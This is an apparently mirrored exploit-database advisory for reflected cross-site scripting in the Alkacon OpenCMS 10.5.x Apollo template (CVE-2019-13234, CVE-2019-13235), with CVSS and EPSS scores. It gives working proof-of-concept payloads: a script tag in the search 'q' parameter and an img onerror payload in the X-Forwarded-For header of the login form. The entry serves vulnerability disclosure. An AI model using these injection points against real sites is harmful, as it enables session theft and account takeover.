Alkacon OpenCMS 10.5.x - Cross-Site Scripting

2019-09-0200:00:00

Aetsu

www.exploit-db.com

233

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6.5

Confidence

High

EPSS

0.001

Percentile

44.0%

JSON

# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/apollo-template
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13234, CVE-2019-13235

1. Reflected XSS in the search engine:
- Affected resource -> "q"
POC:
```
https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&
```
2. Reflected XSS in login form:
POC:
The vulnerability appears when the header X-Forwarded-For is used as shown
in the next request:
```
GET
/login/index.html?requestedResource=&name=Editor&password=editor&action=login
HTTP/1.1
Host: example.com
X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja
```


Extended POCs: https://aetsu.github.io/OpenCms